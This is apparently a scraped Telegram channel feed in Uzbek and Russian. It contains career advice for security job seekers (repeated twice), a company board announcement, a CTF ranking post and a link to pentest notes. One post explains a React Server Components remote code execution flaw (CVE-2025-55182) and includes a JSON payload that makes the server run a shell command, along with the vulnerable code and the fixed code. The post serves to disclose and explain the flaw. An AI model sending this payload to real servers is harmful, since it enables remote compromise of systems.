Oxirgi kunlarda ishga kirish qiyinlashib ketmadimi?
Nega ko‘p joylar bo‘sh ish o‘rni ochishadiyu, lekin siz talablarga mos bo‘lsangiz ham, hatto suhbatga ham chaqirishmaydi?
Siz nima qilsangiz ishga olinishingiz ehtimoli haqiqatan oshadi?
Shu savollarga o‘z fikrimni yozmoqchiman.
Asosiy muammo — siz hamma bilan bir xil bo‘lib qolgansiz.
Hamma “OWASP Top 10 bilaman”, “SQLi qila olaman Sqlmap run qilaman tamom”, “kurs tugatganman”, “CTF bajarama” degan joyda turibdi. Bu yomon emas, lekin bu endi farq qilmaydigan standart minimum.
Haqiqat shuki, bugungi bozor “CTF solver” emas, real muammo yechuvchi mutaxassis qidirmoqda.
Ba’zi odamlar juda kuchli bo’lishiga qaramay, nega intervyuga ham chaqirilmaydi? Chunki:
— Portfolio yo‘q
— Real loyihaga qo‘shgan hissasi yo‘q
— Faqat kurslar bilan devorni to‘ldirgan, amaliyotga kelganda jimmm
— “Boshqalardan nimam bilan farq qilaman?” degan savolga javob yo‘q…
Kompaniya bugun eski usul bilan, kitobdagi OWASP bilan emas, o‘z xizmatlariga bevosita ta’sir ko‘rsatadigan odam qidirmoqda.
Bugun bozorga kerak bo’lgan odam — “haqiqiy ishlab turgan tizimlarda muammolar topa oladigan”, “fikrlashi o‘zgacha”, “o‘zi mustaqil research qila oladigan”, “CVE olish darajasida tahlil qila oladigan” mutaxassis.
Ya’ni siz boshqacha bo‘lishingiz kerak.
Agar ishga kirish imkoniyatingizni oshirmoqchi bo‘lsangiz:
1) Portfolio – eng kuchli qiling.
Real zaifliklar, real PoClar, real yozilgan reportlar. Hatto private bo‘lsa ham — redacted versiyasini blogga chiqarsangiz bo‘ladi.
2) Research mindset.
Bugun bozorda “vazifa bajaruvi” emas, “muammo topuvchi va yechuvchi” yutadi.
3) Real codebaseda ishlay olishingiz.
CTFdа exploit qilgan bo‘lish yetmaydi — real loyiha arxitekturasini o‘qiy olish kerak.
4) Brand qurish.
Sizni kimdir ko‘rmasa, sizni “ishga olish” haqida o‘ylamaydi ham. Portfolio + GitHub + blog + LinkedIn — bu hozirgi davrning yangi CV’si.
5) Tanqidiy va mustaqil fikrlash.
Hamma exploit ko‘chiradi — siz esa exploit yaratasiz.
Hamma PoC ishlatadi — siz esa zaiflikning ildiz sababi haqida yozasiz.
Farq shu yerda.
Bugungi bozorda “men hamma qiladigan ishni qilaman” odam emas,
“men yarataman, o‘rganaman, tahlil qilaman” odam yutadi.
Btw
Ko’roq BugBountylarda qatnashing.
research qilib CVE oladigan darajada bo’lishingiz kerak deganda hech bo’lmaganda avval topilgan yoki hozirgi kunda topilayotgan zaifliklarni “public exploit”larini olib codelarini o’qib qayerda? qanday? va qayerga? Degan savollarga javob izlang va aniq bir kun siz ham CVE yoki hech kim topolmagan Zero-Daylar topasiz
@JavaSecuz
Nega ko‘p joylar bo‘sh ish o‘rni ochishadiyu, lekin siz talablarga mos bo‘lsangiz ham, hatto suhbatga ham chaqirishmaydi?
Siz nima qilsangiz ishga olinishingiz ehtimoli haqiqatan oshadi?
Shu savollarga o‘z fikrimni yozmoqchiman.
Asosiy muammo — siz hamma bilan bir xil bo‘lib qolgansiz.
Hamma “OWASP Top 10 bilaman”, “SQLi qila olaman Sqlmap run qilaman tamom”, “kurs tugatganman”, “CTF bajarama” degan joyda turibdi. Bu yomon emas, lekin bu endi farq qilmaydigan standart minimum.
Haqiqat shuki, bugungi bozor “CTF solver” emas, real muammo yechuvchi mutaxassis qidirmoqda.
Ba’zi odamlar juda kuchli bo’lishiga qaramay, nega intervyuga ham chaqirilmaydi? Chunki:
— Portfolio yo‘q
— Real loyihaga qo‘shgan hissasi yo‘q
— Faqat kurslar bilan devorni to‘ldirgan, amaliyotga kelganda jimmm
— “Boshqalardan nimam bilan farq qilaman?” degan savolga javob yo‘q…
Kompaniya bugun eski usul bilan, kitobdagi OWASP bilan emas, o‘z xizmatlariga bevosita ta’sir ko‘rsatadigan odam qidirmoqda.
Bugun bozorga kerak bo’lgan odam — “haqiqiy ishlab turgan tizimlarda muammolar topa oladigan”, “fikrlashi o‘zgacha”, “o‘zi mustaqil research qila oladigan”, “CVE olish darajasida tahlil qila oladigan” mutaxassis.
Ya’ni siz boshqacha bo‘lishingiz kerak.
Agar ishga kirish imkoniyatingizni oshirmoqchi bo‘lsangiz:
1) Portfolio – eng kuchli qiling.
Real zaifliklar, real PoClar, real yozilgan reportlar. Hatto private bo‘lsa ham — redacted versiyasini blogga chiqarsangiz bo‘ladi.
2) Research mindset.
Bugun bozorda “vazifa bajaruvi” emas, “muammo topuvchi va yechuvchi” yutadi.
3) Real codebaseda ishlay olishingiz.
CTFdа exploit qilgan bo‘lish yetmaydi — real loyiha arxitekturasini o‘qiy olish kerak.
4) Brand qurish.
Sizni kimdir ko‘rmasa, sizni “ishga olish” haqida o‘ylamaydi ham. Portfolio + GitHub + blog + LinkedIn — bu hozirgi davrning yangi CV’si.
5) Tanqidiy va mustaqil fikrlash.
Hamma exploit ko‘chiradi — siz esa exploit yaratasiz.
Hamma PoC ishlatadi — siz esa zaiflikning ildiz sababi haqida yozasiz.
Farq shu yerda.
Bugungi bozorda “men hamma qiladigan ishni qilaman” odam emas,
“men yarataman, o‘rganaman, tahlil qilaman” odam yutadi.
Btw
Ko’roq BugBountylarda qatnashing.
research qilib CVE oladigan darajada bo’lishingiz kerak deganda hech bo’lmaganda avval topilgan yoki hozirgi kunda topilayotgan zaifliklarni “public exploit”larini olib codelarini o’qib qayerda? qanday? va qayerga? Degan savollarga javob izlang va aniq bir kun siz ham CVE yoki hech kim topolmagan Zero-Daylar topasiz
@JavaSecuz
1👏11😁3👍2🕊1
Forwarded from Ilhom Sobirov - GAP BOR!
🇷🇺 Сегодня я с гордостью объявляю, что присоединяюсь к совету директоров Turan Security.
Это не просто компания, это кибер-спецназ, играющий в высшей мировой лиге. Факты говорят сами за себя:
🚀 Мировой уровень: Мы в Hall of Fame NASA, Google, Alibaba и Amazon за найденные уязвимости.
Победы и доминирование: Наша команда Flagshare (часть экосистемы TuranSec) вернулась с международной конференции Cyber Kün 2025 в Бишкеке с триумфом: 🥇 1-е место в общем зачете турнира Cyber Ordo.
А также на Cyberkent 3.0 мы заняли: 🥇 1-е место — Blue team (Защита) 🥈 2-е место — Red team (Атака) 🥉 3-е место — CTF MASTER.
🧠 Элитная экспертиза подтверждена сертификатами, которые считаются "золотым стандартом" индустрии: CISSP, OSCP, PNPT, CISM, CEH и еще десятком других (CWEE, BTL1, CRTP, CAP, CAPP, CPTS, BCSP, ACSP, CMPen, CEDP).
🛡️ Национальный кибер-щит: Этой экспертизе доверяют более 30 крупнейших компаний Узбекистана, включая Ipak Yo'li banki, Hamkorbank, Click, Uztelecom, IT Park, O'zbekiston Temir Yo'llari и многие другие.
🇺🇿 Bugun men kiberxavfsizlik bo‘yicha jahon ligasida o‘ynayotgan Turan Security kompaniyasi direktorlar kengashiga qo‘shilganimni faxr bilan e’lon qilaman.
Bu shunchaki kompaniya emas, bu kiber-maxsus otryad. Faktlar gapirsin:
🚀 Jahon darajasi: Alibaba, Google, Amazon va hatto NASA — bizning Bug Bounty ro‘yxatimizda. Jamoa bir necha bor kritik zaifliklarni aniqlagan va ushbu gigantlarning Shon-sharaf zaliga (Hall of Fame) kiritilgan.
🏆 Chempionlar: Jamoamiz yaqinda Cyber Kün 2025 xalqaro turnirida mutlaq 1-o‘rinni egalladi.
Cyberkent 3.0 musobaqasida biz quyidagi o‘rinlar: 🥇 1-o‘rin — Blue team (Himoya) 🥈 2-o‘rin — Red team (Hujum) 🥉 3-o‘rin — CTF MASTER
🧠 Elita: CISSP, OSCP kabi o‘ntalab "oltin standart" sertifikatlariga egamiz.
🛡️ Ishonch: Ipak Yo'li banki, Click, Uztelecom kabi 30+ yirik kompaniya bizning himoyamizda.
Mening missiyam — odamlarga sarmoya kiritish va O‘zbekistonning eng kuchli milliy kiber-qalqonini qurish.
@TuranSecurity | www.turansecurity.uz
1👍6❤4🔥2
🚨 CVE-2025-55182 - React Server Components RCE
CVSS Score: 10.0/10 (Maximum xavflilik)
Qaysi versiyalar vulnerable?
React Server Actions serialize qilayotganda hasOwnProperty check qilmaydi. Natijada prototype chain orqali kirib, server'da istalgan code run qilish mumkin.
Vulnerable code:
Prototype chain muammosi:
Exploit qanday ishlaydi?
Attacker shunday payload yuboradi:
Server bu request'ni qabul qilgach:
Fixed code:
CVSS Score: 10.0/10 (Maximum xavflilik)
Qaysi versiyalar vulnerable?
React 19.0.0 - 19.2.0
Next.js 15.x va 16.x (App Router)
Server Components ishlatadigan barcha loyihalar
React Server Actions serialize qilayotganda hasOwnProperty check qilmaydi. Natijada prototype chain orqali kirib, server'da istalgan code run qilish mumkin.
Vulnerable code:
function requireModule(metadata) {
const moduleExports = require(metadata[0]);
return moduleExports[metadata[2]]; // prototype chain ga kiradi
}Prototype chain muammosi:
const vm = require('vm');
vm.hasOwnProperty('runInThisContext'); // false
vm['runInThisContext']; // lekin accessible! ❌Exploit qanday ishlaydi?
Attacker shunday payload yuboradi:
{
"$ACTION_REF_0": "",
"$ACTION_0:0": {
"id": "vm#runInThisContext",
"bound": ["require('child_process').execSync('whoami').toString()"]
}
}Server bu request'ni qabul qilgach:
1.vm module'ni load qiladi
2.vm['runInThisContext'] prototype orqali olinadi
3.Attacker'ning code'i argument sifatida bind .bo'ladi
4.Execute bo'lganda vm.runInThisContext() malicious code'ni ishga tushiradi
5.RCE achieved - server butunlay compromised
Fixed code:
function requireModule(metadata) {
const moduleExports = require(metadata[0]);
if (!hasOwnProperty.call(moduleExports, metadata[2])) {
throw new Error('Export not found');
}
return moduleExports[metadata[2]];
}❤1
JavaSec
🚨 CVE-2025-55182 - React Server Components RCE CVSS Score: 10.0/10 (Maximum xavflilik) Qaysi versiyalar vulnerable? React 19.0.0 - 19.2.0 Next.js 15.x va 16.x (App Router) Server Components ishlatadigan barcha loyihalar React Server Actions serialize qilayotganda…
image_2025-12-04_10-47-39.png
442.7 KB
❤1
Forwarded from Turan Security
🏆 BlackHat MEA 2025 CTF musobaqasida 12-o'rin!
Turan Security va O'zbekiston shahafini himoya qilgan jamoa dunyoning eng nufuzli kiberxavfsizlik musobaqalaridan birida 125 jamoa orasidan TOP-12 talikdan joy oldi!
Saudiya Arabistoning Ar-Riyod shahrida o‘tkazilgan BlackHat MEA tadbiri - global miqyosdagi eng kuchli mutaxassislar, ekspertlar va jahonning yetakchi kiberxavfsizlik jamoalari uchrashadigan maydon.
TOP jamoalar orasida Team lead’imiz qiyinlik darajasi yuqori bo'lgan 3 ta taskda:
Bizning maqsadimiz xalqaro maydonda O‘zbekistonni nufuzini oshirish, yoshlarga ilhom berish va kiberxavfsizlik sohasini rivojlantirish.
Turan Security va O'zbekiston shahafini himoya qilgan jamoa dunyoning eng nufuzli kiberxavfsizlik musobaqalaridan birida 125 jamoa orasidan TOP-12 talikdan joy oldi!
Saudiya Arabistoning Ar-Riyod shahrida o‘tkazilgan BlackHat MEA tadbiri - global miqyosdagi eng kuchli mutaxassislar, ekspertlar va jahonning yetakchi kiberxavfsizlik jamoalari uchrashadigan maydon.
TOP jamoalar orasida Team lead’imiz qiyinlik darajasi yuqori bo'lgan 3 ta taskda:
🚩Firstblood - web, birinchi;
🚩Firstblood - forensics, birinchi;
🚩Secondblood - web, ikkinchi bo'lib flagni aniqlashga erishdi.
Bizning maqsadimiz xalqaro maydonda O‘zbekistonni nufuzini oshirish, yoshlarga ilhom berish va kiberxavfsizlik sohasini rivojlantirish.
1🔥7❤2🤝1
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥12❤🔥3🕊1
JavaSec
Why mid-January🤔
Nvidia also hacked 😎
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5🤡3🕊2
CPTS (HTB) o'rganayotganlar uchun aloxida notelar
https://github.com/sachinn403/PentestCodeX/tree/main/courses/cpts-main
https://github.com/sachinn403/PentestCodeX/tree/main/courses/cpts-main
GitHub
PentestCodeX/courses/cpts-main at main · sachinn403/PentestCodeX
Notes. Contribute to sachinn403/PentestCodeX development by creating an account on GitHub.
👏7❤1👍1